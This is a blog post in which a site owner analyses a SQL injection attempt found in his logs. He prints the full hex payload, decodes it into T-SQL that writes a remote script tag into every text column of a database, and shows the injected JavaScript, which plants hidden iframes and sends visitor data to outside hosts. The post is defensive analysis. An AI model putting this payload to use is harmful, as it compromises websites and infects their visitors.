I was reviewing the logs from my site today and noticed this error message:
Error:
System.FormatException: Input string was not in a correct format.
at System.Number.StringToNumber(String str, NumberStyles options,
NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal)
...
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint,
Boolean includeStagesAfterAsyncPoint)
while processing http://www.stevetrefethen.com/blog/monthview.aspx?year=2004;DECLARE @S CHAR(4000);
SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303
029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E61
6D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726
520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72
20622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504
54E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220
494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632
827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C7363
72697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223
E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B
6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756
E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854
2046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C6
55F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);.
As you can see there has been a bunch of "stuff" tacked onto the end of a URL starting with a few SQL statements. The rest is hex encoded text that when decoded reads as follows (FAIR WARNING: DO NOT ATTEMPT TO BROWSE TO THESE URLS UNLESS YOU KNOW WHAT YOU’RE DOING, YOU’VE BEEN WARNED):
1 DECLARE @T varchar(255),@C varchar(4000)
2 DECLARE Table_Cursor CURSOR FOR
3 select a.name,b.name from sysobjects a,syscolumns b
4 where a.id=b.id and a.xtype='u' and
5 (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
6 OPEN Table_Cursor
7 FETCH NEXT FROM Table_Cursor
8 INTO @T,@C
9 WHILE(@@FETCH_STATUS=0)
10 BEGIN
11 exec('update ['+@T+'] set ['+@C+']=''"></title><script
12 src="http://www0.douhunqn.cn/csrss/w.js">
13 </script><!--''+['+@C+'] where '+@C+' not like ''%">
14 </title>
15 <script src="http://www0.douhunqn.cn/csrss/w.js">
16 </script><!--''')
17 FETCH NEXT FROM Table_Cursor
18 INTO @T,@C
19 END
20 CLOSE Table_Cursor
21 DEALLOCATE Table_Cursor
Which is attempting to inject the following JavaScript onto pages on the site:
1 Close Window
2
3 window.onerror = function() {
4 document.write("<iframe width=0 height=0
5 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");
6 return true;
7 }
8 if(typeof(js2eus) == "undefined") {
9 var js2eus = 1;
10 var yesdata;
11 yesdata = '&refe=' + escape(document.referrer) + '&location=' +
12 escape(document.location) + '&color=' + screen.colorDepth + 'x&
13 resolution=' + screen.width + 'x' + screen.height + '&
14 returning=' + cc_k() + '&language=' + navigator.systemLanguage + '&
15 ua=' + escape(navigator.userAgent);
16 document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0
17 VSPACE=0 FRAMEBORDER=0 SCROLLING=no
18 src=http://count41.51yes.com/sa.aspx?id=419214144' +
19 yesdata + ' height=0 width=0></iframe>');
20 document.write("<iframe width=0 height=0
21 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");
22 }
23 function y_gVal(iz) {
24 var endstr = document.cookie.indexOf(";", iz);
25 if(endstr ==- 1) endstr = document.cookie.length;
26 return document.cookie.substring(iz, endstr);
27 }
28 function y_g(name) {
29 var arg = name + "=";
30 var alen = arg.length;
31 var clen = document.cookie.length;
32 var i = 0;
33 var j;
34 while(i < clen) {
35 j = i + alen;
36 if(document.cookie.substring(i, j) == arg) return y_gVal(j);
37 i = document.cookie.indexOf(" ", i) + 1;
38 if(i == 0) break;
39 }
40 return null;
41 }
42 function cc_k() {
43 var y_e = new Date();
44 var y_t = 93312000;
45 var yesvisitor = 1000 * 36000;
46 var yesctime = y_e.getTime();
47 y_e.setTime(y_e.getTime() + y_t);
48 var yesiz = document.cookie.indexOf("cck_lasttime");
49 if(yesiz ==- 1) {
50 document.cookie = "cck_lasttime=" + yesctime + "; expires=" +
51 y_e.toGMTString() + "; path=/";
52 document.cookie = "cck_count=0; expires=" + y_e.toGMTString() + ";
53 path=/";
54 return 0;
55 }
56 else {
57 var y_c1 = y_g("cck_lasttime");
58 var y_c2 = y_g("cck_count");
59 y_c1 = parseInt(y_c1);
60 y_c2 = parseInt(y_c2);
61 y_c3 = yesctime - y_c1;
62 if(y_c3 > yesvisitor) {
63 y_c2 = y_c2 + 1;
64 document.cookie = "cck_lasttime=" + yesctime + "; expires=" +
65 y_e.toGMTString() + "; path=/";
66 document.cookie = "cck_count=" + y_c2 + "; expires=" +
67 y_e.toGMTString() + "; path=/";
68 }
69 return y_c2;
70 }
71 }
72
73 Close Window
Which lead to an IFRAME getting inserted into the page that executed more Javascript that attempts to exploit the following ActiveX controls:
- GLIEDown.IEDown.1
- IERPCtl.IERPCtl.1
- MPS.StormPlayer
Fortunately, nothing on my site runs using MSSQL including my blog so this isn’t particularly troubling for me. It sort of looks like it could be related to this sort of attack as the domains have the .cn suffix for China and the description sounds quite similar.
Other than perusing my logs occasionally I don’t have anything that scans my logs looking for potential exploits. Do you use anything? If so, what approach do you use?